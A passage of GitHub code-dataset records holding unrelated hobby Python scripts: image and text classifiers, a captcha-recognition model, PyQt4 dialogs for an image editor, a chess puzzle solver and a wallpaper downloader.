#csv2es()\n\n","repo_name":"fxarte/es_bulk","sub_path":"csv2es.py","file_name":"csv2es.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"7882901061","text":"import tensorflow as tf\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\n\r\n# Define the input shape of the images\r\ninput_shape = (224, 224, 3)\r\n\r\n# Create a CNN model\r\nmodel = tf.keras.Sequential([\r\n layers.Conv2D(32, (3, 3), activation='relu', input_shape=input_shape),\r\n layers.MaxPooling2D((2, 2)),\r\n layers.Conv2D(64, (3, 3), activation='relu'),\r\n layers.MaxPooling2D((2, 2)),\r\n layers.Conv2D(128, (3, 3), activation='relu'),\r\n layers.MaxPooling2D((2, 2)),\r\n layers.Flatten(),\r\n layers.Dense(64, activation='relu'),\r\n layers.Dense(4, activation='softmax')\r\n])\r\n\r\n# Compile the model\r\nmodel.compile(optimizer='adam',\r\n loss='categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n# Create an ImageDataGenerator for data augmentation\r\ntrain_datagen = ImageDataGenerator(rescale=1./255,\r\n rotation_range=20,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\n\r\n# Load the training data from a directory\r\ntrain_data = train_datagen.flow_from_directory('C:/Users/Aayush Srivastava/New folder/dog_emot/images',\r\n target_size=input_shape[:2],\r\n batch_size=32,\r\n class_mode='categorical')\r\n\r\n# Create an ImageDataGenerator for preprocessing the validation data\r\nval_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\n# Load the validation data from a directory\r\nval_data = val_datagen.flow_from_directory('C:/Users/Aayush Srivastava/New folder/dog_emot/images',\r\n target_size=input_shape[:2],\r\n batch_size=32,\r\n class_mode='categorical')\r\n\r\n# Train the model\r\nmodel.fit(train_data,\r\n validation_data=val_data,\r\n epochs=10)\r\n\r\n# Save the model\r\nmodel.save('dog_emotions_model.h5')\r\n","repo_name":"aksaayush/Dog_Emotions","sub_path":"dog_emotions.py","file_name":"dog_emotions.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27884393370","text":"import argparse\nimport pandas as pd\nimport re\nimport os\nimport html\nfrom sklearn.model_selection import train_test_split\n\ndef update_polarity(polarity):\n if polarity==0:\n return 0\n else:\n return 1\n\ndef preprocess_tweet(text):\n # remove HTML tags\n def remove_html_tags(sentence):\n sentence = html.unescape(sentence)\n sentence = sentence.replace(\"\\\\\", \"\")\n sentence = sentence.replace(\"\\r\", \" \")\n sentence = sentence.replace(\"\\n\", \" \")\n\n p = re.compile(r'\\/\\w+\\/')\n sentence = re.sub(p, ' ', sentence)\n\n p = re.compile('<.*?>')\n sentence = re.sub(p, ' ', str(sentence))\n\n sentence = re.sub(r'http\\S+', '', sentence)\n return sentence\n\n text = remove_html_tags(text)\n\n # remove @ Instances\n p = re.compile('@.*?\\s+')\n text = re.sub(p, '', text)\n\n return text\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"input_dataset\", type=str, help=\"input dataset file (.csv)\",\n )\n\n args = parser.parse_args()\n\n df = pd.read_csv(args.input_dataset, header=None,\n names=['polarity', 'id', 'date', 'query', 'user', 'tweet'], encoding='latin-1')\n\n df['polarity'] = df.polarity.apply(update_polarity)\n df['tweet'] = df.tweet.apply(preprocess_tweet)\n\n # Sampling 100000 entries (resource constraints)\n # df = df.sample(100000)\n\n df_train, df_val = train_test_split(df, test_size=0.2)\n df_val, df_test = train_test_split(df_val, test_size=0.5)\n\n data_dir = 'data'\n\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n\n df_train.to_csv(os.path.join(data_dir, \"train.csv\"), sep=',', columns=['polarity', 'tweet'], index=False)\n df_val.to_csv(os.path.join(data_dir, \"validation.csv\"), sep=',', columns=['polarity', 'tweet'], index=False)\n df_test.to_csv(os.path.join(data_dir, \"test.csv\"), sep=',', columns=['polarity', 'tweet'], index=False)\n","repo_name":"mkartik/NLP_model_implementations","sub_path":"sentiment_analysis/generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1094390160","text":"import torch\nimport torch.nn as nn\nfrom torchvision.transforms.functional import to_tensor\nfrom torchvision.transforms import Compose, ToTensor\nfrom datasets import CaptchaData\nfrom models import CNN\nfrom PIL import Image\n\nsource = [str(i) for i in range(0, 10)]\nsource += [chr(i) for i in range(97, 97+26)]\nmodel_path = './model.pth'\n\ncnn = CNN()\nif torch.cuda.is_available():\n cnn = cnn.cuda()\n cnn.eval()\n cnn.load_state_dict(torch.load(model_path))\nelse:\n cnn.eval()\n cnn.load_state_dict(torch.load(model_path, map_location='cpu'))\n\n# img_path:单张图片路径\ndef captchaByPath(img_path):\n img = Image.open(img_path)\n img = to_tensor(img)\n if torch.cuda.is_available():\n img = img.view(1, 3, 32, 120).cuda()\n else:\n img = img.view(1, 3, 32, 120)\n output = cnn(img)\n output = output.view(-1, 36)\n output = nn.functional.softmax(output, dim=1)\n output = torch.argmax(output, dim=1)\n output = output.view(-1, 4)[0]\n return ''.join([source[i] for i in output.cpu().numpy()])\n\n# img_path:包含多张图片的目录\ndef captchaByDir(img_dir):\n transforms = Compose([ToTensor()])\n dataset = CaptchaData(img_dir, transform=transforms)\n lable = []\n\n for k, (img, target) in enumerate(dataset):\n if torch.cuda.is_available():\n img = img.view(1, 3, 32, 120).cuda()\n else:\n img = img.view(1, 3, 32, 120)\n output = cnn(img)\n output = output.view(-1, 36)\n output = nn.functional.softmax(output, dim=1)\n output = torch.argmax(output, dim=1)\n output = output.view(-1, 4)[0]\n lable.append(''.join([source[i] for i in output.cpu().numpy()]))\n return lable\n","repo_name":"xHalo921/captcha","sub_path":"cnn_captcha.py","file_name":"cnn_captcha.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15005733292","text":"#!/usr/bin/env python\n#coding: utf-8\n\nimport os\n\nfrom PyQt4 import QtGui, QtCore\nfrom PyQt4.QtCore import Qt\n\n## Vista/View\nclass NewFileDialog(QtGui.QDialog):\n\t\"\"\"\n\tLa ventanita que se abre cuando queremos crear un archivo nuevo.\n\t\"\"\"\n\n\tdef __init__(self, data, Parent=None):\n\n\t\tsuper(NewFileDialog,self).__init__(Parent)\n\t\tself.data = data\n\t\tself.parent = Parent\n\n\t\tdimensionGroup = QtGui.QGroupBox(self.parent.data.getText(\"dialog_new_image\", \"dimension\"))\n\t\tdimensionLayout = QtGui.QVBoxLayout()\n\t\tself.width = QtGui.QSpinBox(dimensionGroup)\n\t\tself.width.setMinimum(1)\n\t\tself.width.setMaximum(4096)\n\t\tself.width.setValue(self.data.getIntDefault(\"new\", \"width\", 32))\n\t\tself.height = QtGui.QSpinBox(dimensionGroup)\n\t\tself.height.setMinimum(1)\n\t\tself.height.setMaximum(4096)\n\t\tself.height.setValue(self.data.getIntDefault(\"new\", \"height\", 32))\n\t\tdimensionLayout.addWidget(self.width)\n\t\tdimensionLayout.addWidget(self.height)\n\t\tdimensionGroup.setLayout(dimensionLayout)\n\n\t\tbackgroundGroup = QtGui.QGroupBox(self.parent.data.getText(\"dialog_new_image\", \"background\"))\n\t\tbackgroundLayout = QtGui.QVBoxLayout()\n\t\tself.r1 = QtGui.QRadioButton(self.parent.data.getText(\"dialog_new_image\", \"transparent\"))\n\t\tself.r1.setChecked(True)\n\t\tself.r2 = QtGui.QRadioButton(self.parent.data.getText(\"dialog_new_image\", \"color\"))\n\t\tself.cButton = QtGui.QPushButton()\n\t\tself.cButton.clicked.connect(self.getColor)\n\t\tself.cButton.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)\n\t\tself.color = QtGui.QColor(255,255,255)\n\t\tself.cButton.setStyleSheet(\"background-color: \" + self.color.name() +\";\")\n\t\tself.cButton.setText(self.color.name())\n\t\tcolorLayout = QtGui.QHBoxLayout()\n\t\tcolorLayout.addWidget(self.r2)\n\t\tcolorLayout.addWidget(self.cButton)\n\t\tbackgroundLayout.addWidget(self.r1)\n\t\t#backgroundLayout.addWidget(r2)\n\t\tbackgroundLayout.addLayout(colorLayout)\n\t\tbackgroundGroup.setLayout(backgroundLayout)\n\n\t\tbuttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Cancel)\n\t\t#buttonBox.accepted.connect(self.accept)\n\t\tbuttonBox.accepted.connect(self.accept)\n\t\tbuttonBox.rejected.connect(self.reject)\n\t\tmainLayout = QtGui.QVBoxLayout()\n\t\tmainLayout.addWidget(dimensionGroup)\n\t\tmainLayout.addWidget(backgroundGroup)\n\t\tmainLayout.addWidget(buttonBox)\n\t\tself.setLayout(mainLayout)\n\t\tself.setWindowTitle(self.parent.data.getText(\"dialog_new_image\", \"title\"))\n\t\tself.initUI()\n\n\tdef initUI(self):\n\n\t\tself.show()\n\n\tdef getColor(self):\n\n\t\tself.color = QtGui.QColorDialog.getColor()\n\t\tif self.color.isValid(): \n\t\t\tself.r2.setChecked(True)\n\t\t\tself.cButton.setStyleSheet(\"background-color: \" + self.color.name() +\";\")\n\t\t\tself.cButton.setText(self.color.name())\n\n\tdef accept(self):\n\n\t\tif self.r1.isChecked():\n\t\t\tself.data.newImage(self.width.value(), self.height.value(), QtGui.QColor(0,0,0,0))\n\t\telse:\n\t\t\tself.data.newImage(self.width.value(), self.height.value(), self.color)\n\t\tself.data.setDefault(\"new\", \"width\", str(self.width.value()))\n\t\tself.data.setDefault(\"new\", \"height\", str(self.height.value()))\n\t\tsuper(NewFileDialog, self).accept()\n\n\nclass ResizeImageDialog (QtGui.QDialog):\n\n\tdef __init__(self, Parent=None):\n\n\t\tsuper(ResizeImageDialog, self).__init__(Parent)\n\n\t\tself.parent = Parent\n\n\t\tdimensionGroup = QtGui.QGroupBox(self.parent.data.getText(\"dialog_resize\", \"dimension\"))\n\t\tdimensionLayout = QtGui.QVBoxLayout()\n\n\t\tself.width = QtGui.QSpinBox(dimensionGroup)\n\t\tself.width.setMinimum(1)\n\t\tself.width.setMaximum(4096)\n\t\tself.width.setValue(Parent.data.image.width())\n\t\tself.height = QtGui.QSpinBox(dimensionGroup)\n\t\tself.height.setMinimum(1)\n\t\tself.height.setMaximum(4096)\n\t\tself.height.setValue(Parent.data.image.height())\n\n\t\tdimensionLayout.addWidget(self.width)\n\t\tdimensionLayout.addWidget(self.height)\n\t\tdimensionGroup.setLayout(dimensionLayout)\n\t\t\n\t\tbuttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Cancel)\n\t\tbuttonBox.accepted.connect(self.accept)\n\t\tbuttonBox.rejected.connect(self.reject)\n\n\t\tmainLayout = QtGui.QVBoxLayout()\n\t\tmainLayout.addWidget(dimensionGroup)\n\t\tmainLayout.addWidget(buttonBox)\n\n\t\tself.setLayout(mainLayout)\n\t\tself.setWindowTitle(self.parent.data.getText(\"dialog_resize\", \"title\"))\n\t\tself.show()\n\n\tdef accept(self):\n\t\n\t\tself.parent.data.resizeImage(self.width.value(), self.height.value())\n\t\tsuper(ResizeImageDialog,self).accept()\n\n\nclass ResizeCanvasDialog (QtGui.QDialog):\n\n\tdef __init__(self, Parent=None):\n\n\t\tsuper(ResizeCanvasDialog, self).__init__(Parent)\n\n\t\tself.parent = Parent\n\n\t\tdimensionGroup = QtGui.QGroupBox(self.parent.data.getText(\"dialog_resize_canvas\", \"dimension\"))\n\t\tdimensionLayout = QtGui.QVBoxLayout()\n\n\t\tself.width = QtGui.QSpinBox(dimensionGroup)\n\t\tself.width.setMinimum(1)\n\t\tself.width.setMaximum(1024)\n\t\tself.width.setValue(Parent.data.image.width())\n\t\tself.height = QtGui.QSpinBox(dimensionGroup)\n\t\tself.height.setMinimum(1)\n\t\tself.height.setMaximum(1024)\n\t\tself.height.setValue(Parent.data.image.height())\n\n\t\tdimensionLayout.addWidget(self.width)\n\t\tdimensionLayout.addWidget(self.height)\n\t\tdimensionGroup.setLayout(dimensionLayout)\n\t\t\n\t\tbuttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Cancel)\n\t\tbuttonBox.accepted.connect(self.accept)\n\t\tbuttonBox.rejected.connect(self.reject)\n\n\t\tmainLayout = QtGui.QVBoxLayout()\n\t\tmainLayout.addWidget(dimensionGroup)\n\t\tmainLayout.addWidget(buttonBox)\n\n\t\tself.setLayout(mainLayout)\n\t\tself.setWindowTitle(self.parent.data.getText(\"dialog_resize_canvas\", \"title\"))\n\t\tself.show()\n\n\tdef accept(self):\n\t\n\t\tself.parent.data.resizeCanvas(self.width.value(), self.height.value())\n\t\tsuper(ResizeCanvasDialog,self).accept()\n\n\nclass Preferences (QtGui.QDialog):\n\n\tdef __init__(self, data, com, Parent=None):\n\n\t\tsuper(Preferences, self).__init__(Parent)\n\t\tself.data = data\n\t\tself.com = com\n\t\tself.parent = Parent\n\n\t\t# El QStackedWidget es un tipo de widget muy útil que tiene diferentes \"páginas\" y podemos ir cambiando entre ellas\n\t\t# con sólo llamar a un método. En nuestro caso, conectamos el signal que emite el QListWidget al cambiar de sección\n\t\t# con el método self.changeCurrentView, que cambia la página del QStackedWidget.\n\n\t\tself.view = QtGui.QStackedWidget()\n\t\tself.view.addWidget(self.createLanguageView())\n\t\tself.view.addWidget(self.createUICustomizationView())\n\t\tself.view.addWidget(self.createMatrixGridView())\n\n\t\tself.preferences = QtGui.QListWidget()\n\t\tself.preferences.addItem(self.data.getText(\"dialog_preferences\", \"item_language\"))\n\t\tself.preferences.addItem(self.data.getText(\"dialog_preferences\", \"item_theme\"))\n\t\tself.preferences.addItem(self.data.getText(\"dialog_preferences\", \"item_matrix_grid\"))\n\t\tself.preferences.setCurrentRow(0)\n\t\tself.preferences.currentItemChanged.connect(self.changeCurrentView)\n\t\tself.preferences.setFixedWidth(self.preferences.sizeHintForColumn(0) + 24)\n\t\t#self.view.setFixedWidth(200)\n\n\t\tself.buttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Cancel)\n\t\tself.buttonBox.accepted.connect(self.accept)\n\t\tself.buttonBox.rejected.connect(self.reject)\n\n\t\tself.hbox = QtGui.QHBoxLayout()\n\t\tself.hbox.addWidget(self.preferences)\n\t\tself.hbox.addWidget(self.view)\n\n\t\tself.vbox = QtGui.QVBoxLayout()\n\t\tself.vbox.addLayout(self.hbox)\n\t\tself.vbox.addWidget(self.buttonBox)\n\n\t\tself.setLayout(self.vbox)\n\t\tself.setWindowTitle(self.data.getText(\"dialog_preferences\", \"title\"))\n\t\tself.adjustSize()\n\t\tself.show()\n\n\tdef changeCurrentView(self):\n\n\t\tself.view.setCurrentIndex(self.preferences.currentRow())\n\n\tdef createLanguageView(self):\n\n\t\t# Widget de ejemplo\n\n\t\tg = QtGui.QGroupBox(self.data.getText(\"dialog_preferences\", \"item_language_language\"))\n\n\t\tw = QtGui.QWidget()\n\n\t\tvbox = QtGui.QVBoxLayout()\n\n\t\tself.language = QtGui.QComboBox()\n\t\tself.langCodes = []\n\n\t\tj = 0\n\t\tfor i in self.data.tdatabase.d.keys():\n\t\t\tself.language.addItem(self.data.tdatabase.d[i].name)\n\t\t\tlangCode = self.data.tdatabase.d[i].code\n\t\t\tself.langCodes.append(langCode)\n\t\t\tif self.data.lang == langCode:\n\t\t\t\tself.language.setCurrentIndex(j)\n\t\t\tj += 1\n\n\t\tvbox.addWidget(self.language)\n\t\tvbox.setStretch(1,1)\n\t\tvbox.setAlignment(Qt.AlignTop)\n\n\t\tw.setLayout(vbox)\n\n\t\tg.setLayout(vbox)\n\n\t\treturn g\n\n\tdef createUICustomizationView(self):\n\n\t\tg = QtGui.QGroupBox(self.data.getText(\"dialog_preferences\", \"item_theme\"))\n\t\tw = QtGui.QWidget()\n\t\tvbox = QtGui.QVBoxLayout()\n\t\thbox = QtGui.QHBoxLayout()\n\n\t\tself.theme = QtGui.QComboBox()\n\n\t\tj = 0\n\t\tself.themeDirs = [d for d in os.listdir(\"themes\") if os.path.isdir(os.path.join(\"themes\", d))]\n\t\tfor i in self.themeDirs:\n\t\t\tself.theme.addItem(i)\n\t\t\tif self.data.theme == i:\n\t\t\t\tself.theme.setCurrentIndex(j)\n\t\t\tj += 1\n\t\tself.theme.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)\n\t\t#self.theme.setFixedWidth(self.theme.sizeHint().width())\n\n\t\thbox.addWidget(QtGui.QLabel(self.data.getText(\"dialog_preferences\", \"item_theme_theme\")))\n\t\thbox.addWidget(self.theme)\n\t\thbox.setAlignment(Qt.AlignLeft)\n\t\tvbox.addLayout(hbox)\n\n\t\tvbox.setStretch(1,1)\n\t\tvbox.setAlignment(Qt.AlignTop)\n\n\t\tw.setLayout(vbox)\n\t\tg.setLayout(vbox)\n\n\t\treturn g\n\n\tdef createMatrixGridView(self):\n\n\t\tg = QtGui.QGroupBox(self.data.getText(\"dialog_preferences\", \"item_matrix_grid_dimension\"))\n\n\t\tvbox = QtGui.QVBoxLayout()\n\t\t\n\t\tself.matrixGridWidth = QtGui.QSpinBox()\n\t\tself.matrixGridWidth.setMinimum(1)\n\t\tself.matrixGridWidth.setMaximum(1024)\n\t\tself.matrixGridWidth.setValue(self.data.matrixGridWidth)\n\t\tself.matrixGridHeight = QtGui.QSpinBox()\n\t\tself.matrixGridHeight.setMinimum(1)\n\t\tself.matrixGridHeight.setMaximum(1024)\n\t\tself.matrixGridHeight.setValue(self.data.matrixGridHeight)\n\n\t\tvbox.addWidget(self.matrixGridWidth)\n\t\tvbox.addWidget(self.matrixGridHeight)\n\t\tvbox.setStretch(1,1)\n\t\tvbox.setAlignment(Qt.AlignTop)\n\n\t\tg.setLayout(vbox)\n\n\t\treturn g\n\n\tdef accept(self):\n\n\t\tif self.langCodes[self.language.currentIndex()] != self.data.lang:\n\t\t\tQtGui.QMessageBox.information(self, self.data.getText(\"dialog_preferences\", \"item_language_changed_title\"), self.data.getText(\"dialog_preferences\", \"item_language_changed_message\"))\n\t\tself.data.setDefault(\"language\", \"lang\", self.langCodes[self.language.currentIndex()])\n\n\t\tself.data.matrixGridWidth = self.matrixGridWidth.value()\n\t\tself.data.setDefault(\"grid\", \"matrix_grid_width\", self.data.matrixGridWidth)\n\t\tself.data.matrixGridHeight = self.matrixGridHeight.value()\n\t\tself.data.setDefault(\"grid\", \"matrix_grid_height\", self.data.matrixGridHeight)\n\n\t\tif self.data.getDefault(\"theme\", \"theme\", \"aquamarine\") != self.themeDirs[self.theme.currentIndex()]:\n\t\t\tQtGui.QMessageBox.information(self, self.data.getText(\"dialog_preferences\", \"item_theme_changed_title\"), self.data.getText(\"dialog_preferences\", \"item_theme_changed_message\"))\n\t\tself.data.setDefault(\"theme\", \"theme\", self.themeDirs[self.theme.currentIndex()])\n\n\t\tself.com.updateCanvas.emit()\n\t\tsuper(Preferences, self).accept()","repo_name":"MikiLoz92/pixs2pics","sub_path":"dialogs.py","file_name":"dialogs.py","file_ext":"py","file_size_in_byte":10804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18183895602","text":"import json\nimport glob\nimport pickle as pkl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn import svm, tree\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom imblearn.ensemble import RUSBoostClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import normalize, scale\nfrom scipy.cluster.vq import whiten\nfrom imblearn.over_sampling import SMOTE, SVMSMOTE\nfrom sklearn.manifold import TSNE\nfrom sklearn.model_selection import StratifiedKFold\n\n\ndef choose_modality(linguistic_features, visual_features, audio_features, mod='all'):\n if mod == 'l':\n return np.concatenate([linguistic_features], axis=1)\n elif mod == 'a':\n return np.concatenate([audio_features], axis=1)\n elif mod == 'v':\n return np.concatenate([visual_features], axis=1)\n elif mod == 'la':\n return np.concatenate([linguistic_features, audio_features], axis=1)\n elif mod == 'lv':\n return np.concatenate([linguistic_features, visual_features], axis=1)\n elif mod == 'av':\n return np.concatenate([audio_features, visual_features], axis=1)\n elif mod == 'all':\n return np.concatenate([linguistic_features, visual_features, audio_features], axis=1)\n else:\n print('ha?')\n exit()\n\n\n# load data\nfileNameList = glob.glob('processed_features_facenet/*.pkl')\nprint(fileNameList)\n\ntext_list = []\nlabels = []\nvisual_features = []\naudio_features = []\nau_features = []\nfor file_name in fileNameList:\n data_point = pkl.load(open(file_name, 'rb'))\n clip_name, label, transcription, smoothed_seq = data_point[0], data_point[1], data_point[2], data_point[3]\n au_file = 'processed_features/' + file_name.split('\\\\')[1]\n au = pkl.load(open(au_file, 'rb'))\n\n _, _, _, smoothed_seq_au = au[0], au[1], au[2], au[3]\n\n labels.append(label)\n text_list.append(transcription)\n # average visual features\n au_seq = np.stack([w['landmark_feature'] for w in smoothed_seq_au], axis=0)\n visual_seq = np.stack([w['facenet_feature'] for w in smoothed_seq], axis=0)\n\n visual_mean = np.mean(visual_seq, axis=0)\n au_mean = np.mean(au_seq, axis=0)\n visual_features.append(visual_mean)\n au_features.append(au_mean)\n # average audio features\n audio_seq = np.stack([w['audio_grp'] for w in smoothed_seq], axis=0)\n\n audio_mean = np.mean(audio_seq, axis=0)\n audio_features.append(audio_mean)\n\n# print(text_list)\nvectorizer = TfidfVectorizer(min_df=5)\ndocMatrix = vectorizer.fit_transform(text_list)\n\nlinguistic_features = docMatrix.toarray()\nlinguistic_features = scale(linguistic_features)\n# print(linguistic_features)\n\nvisual_features = np.array(visual_features).squeeze()\n# visual_features = scale(visual_features)\n# visual_features = normalize(visual_features)\nau_features = scale(np.array(au_features).squeeze())\nvisual_features = np.concatenate((visual_features, au_features), axis=-1)\n# visual_features = au_features\nvisual_features = normalize(visual_features)\nvisual_features = scale(visual_features)\n# print(visual_features)\naudio_features = np.array(audio_features)\n# audio_features = scale(audio_features)\n# print(audio_features)\nlabels = np.array(labels)\n\n# linguistic_features = normalize(linguistic_features)\n\nfull_data = choose_modality(linguistic_features, visual_features, audio_features, mod='all')\n\nprint(full_data.shape)\n\n# full_data = normalize(full_data)\n# full_data = scale(full_data)\n\nperm = np.random.permutation(len(full_data))\nfull_data = full_data[perm]\nlabels = np.array(labels)[perm]\n\n# initialize cv5\nskf = StratifiedKFold(n_splits=5)\ncv5_ids = list(skf.split(full_data, labels))\n# print(cv5_ids)\n\n# initialize model\n# lin_clf = svm.SVC(decision_function_shape='ovo', probability=True)\n# lin_clf = svm.LinearSVC()\n# lin_clf = LogisticRegression()\n# lin_clf = svm.SVC(kernel='sigmoid')\n# lin_clf = MLPClassifier((256,256), activation='relu', max_iter=1000)\n# lin_clf = RandomForestClassifier(n_estimators=5000, max_depth=2, random_state=0)\nsingle_clf = tree.DecisionTreeClassifier(max_depth=1)\n# single_clf = LogisticRegression()\nlin_clf = RUSBoostClassifier(base_estimator=single_clf, n_estimators=5000)\n\n# initialize booster\nsm = SMOTE(random_state=42)\n\n# perform cv5\nprecision_avg = []\nrecall_avg = []\nfscore_avg = []\nacc_avg = 0.\nfor sp in cv5_ids:\n train_data, train_labels = full_data[sp[0]], labels[sp[0]]\n # train_data, train_labels = sm.fit_sample(train_data, train_labels)\n test_data, test_labels = full_data[sp[1]], labels[sp[1]]\n\n lin_clf.fit(train_data, train_labels)\n pred = lin_clf.predict(test_data)\n print(sp[1])\n print(pred)\n print(test_labels)\n # metrics\n precision, recall, fscore, support = precision_recall_fscore_support(test_labels, pred, labels=[0, 1, 2],\n average=None)\n acc = float(sum(pred == test_labels)) / len(test_labels)\n print(precision, recall, fscore, support, acc)\n precision_avg.append(precision)\n recall_avg.append(recall)\n fscore_avg.append(fscore)\n acc_avg += acc\nprecision, recall, fscore = np.mean(precision_avg, axis=0), np.mean(recall_avg, axis=0), np.mean(fscore_avg, axis=0)\nacc_avg = acc_avg / len(cv5_ids)\nprint('cv5-avg:')\nprint(precision, recall, fscore, acc_avg)\n\n","repo_name":"FlamingHorizon/MORSE","sub_path":"cv5.py","file_name":"cv5.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26941362764","text":"pawns = {\"b4\", \"d4\", \"f4\", \"c3\", \"e3\", \"g5\", \"d2\"}\r\npawns = {\"b4\", \"c4\", \"d4\", \"e4\", \"f4\", \"g4\", \"e5\"}\r\npawns = {\"a1\", \"b2\", \"c3\", \"d4\", \"e5\", \"f6\", \"g7\", \"h8\"}\r\n\r\ndef check_pawns(pawns):\r\n pawn_list = []\r\n unsafe_pawns = []\r\n safe_pawns = []\r\n # decode to position\r\n for pawn in pawns:\r\n print(\"handling \"+str(pawn))\r\n file, rank = pawn[0], int(pawn[1])\r\n pawn_list.append((rank, file))\r\n print(pawn_list)\r\n\r\n for pawn in pawn_list:\r\n ok_flag = False\r\n rank, file = pawn[0], pawn[1]\r\n print(\"checking \"+file+str(rank))\r\n\r\n if rank == 1:\r\n unsafe_pawns.append(pawn)\r\n continue\r\n\r\n chk_rank = rank - 1\r\n chk_file1 = chr(ord(file)+1)\r\n if(chk_file1 > 'h'):\r\n chk_file1 = False\r\n chk_file2 = chr(ord(file)-1)\r\n if(chk_file2 < 'a'):\r\n chk_file2 = False\r\n\r\n print(\"file=\"+file+\", chk_file1=\"+str(chk_file1)+\", chk_file2=\"+str(chk_file2))\r\n\r\n for one_pawn in pawn_list:\r\n if chk_file1:\r\n print(\"checking 1: \"+chk_file1+str(chk_rank)+\" with \"+str(one_pawn))\r\n if (chk_rank, chk_file1) == one_pawn:\r\n print(\"found: pawn=\"+str(pawn)+\" protected by \"+str((chk_file1, chk_rank)))\r\n safe_pawns.append(pawn)\r\n ok_flag = True\r\n break\r\n if chk_file2:\r\n print(\"checking 2: \"+chk_file2+str(chk_rank)+str(one_pawn))\r\n if (chk_rank, chk_file2) == one_pawn:\r\n print(\"found: pawn=\"+str(pawn)+\" protected by \"+str((chk_file2, chk_rank)))\r\n safe_pawns.append(pawn)\r\n ok_flag = True\r\n break\r\n if not ok_flag:\r\n unsafe_pawns.append(pawn)\r\n\r\n print(\"unsafe: \"+str(unsafe_pawns))\r\n print(\"safe: \"+str(safe_pawns))\r\n return len(safe_pawns)\r\n\r\nprint(check_pawns(pawns))","repo_name":"mititer/python-study","sub_path":"checkio-chess-pawns.py","file_name":"checkio-chess-pawns.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33193277797","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nimport ctypes\r\n\r\n\r\ndef get_wall():\r\n main_url = \"https://wallpapersite.com\"\r\n\r\n url = main_url + \"/random-wallpapers/\"\r\n page_random = requests.get(url)\r\n content = BeautifulSoup(page_random.text, \"html.parser\")\r\n\r\n i = 0\r\n for link in content.find_all('a'):\r\n i += 1\r\n if i == 40:\r\n next_page = link.get('href')\r\n break\r\n\r\n url2 = main_url + next_page\r\n print(\"-------------------------------------------\")\r\n print(url2)\r\n page_rand_found = requests.get(url2)\r\n content_rand_found = BeautifulSoup(page_rand_found.text, \"html.parser\")\r\n j = 0\r\n for links in content_rand_found.find_all('a'):\r\n j += 1\r\n\r\n wallpaper_links = links.get('href')\r\n if \"1920x1080\" in wallpaper_links:\r\n wallpaper_page = wallpaper_links\r\n if \".jpg\" not in wallpaper_page:\r\n get_wall()\r\n break\r\n\r\n image_url = main_url + wallpaper_page\r\n print(\"-------------------------------------------\")\r\n print(image_url)\r\n r = requests.get(image_url, allow_redirects=True)\r\n open('image.jpg', 'wb').write(r.content)\r\n return\r\n\r\n\r\ndef set_wall():\r\n path = os.path.abspath(\"image.jpg\")\r\n ctypes.windll.user32.SystemParametersInfoW(20, 0, path, 0)\r\n print(\"Wallpaper Changed.\")\r\n return\r\n","repo_name":"HRitvik07/DesktopWallpaperSwitcher","sub_path":"GetWallpaper.py","file_name":"GetWallpaper.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9523992011","text":"from keras.layers import Dense\nfrom keras.models import Model\nfrom keras.datasets import mnist, cifar10\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras import initializers, layers\nfrom keras.layers import Input, Convolution2D, MaxPooling2D, UpSampling2D\n\n\n\ndef encoded(input_img,dim_factor):\n #input_shape=[28, 28, 1]\n #x = Dense(3072, activation='relu')(input_img)\n #x = Dense(1024, activation='relu')(input_img)\n #x = Dense(512, activation='relu')(x)\n #encoded = Dense(encoding_dim, activation='relu')(x)\n \n x = layers.Conv2D(filters=256, kernel_size=9, strides=1, padding='same', activation='relu', name='conv1')(input_img)\n \n x = Convolution2D(64, (3, 3), activation='relu', border_mode='same')(input_img)\n x = MaxPooling2D((2, 2), border_mode='same')(x)\n x = Convolution2D(32, (3, 3), 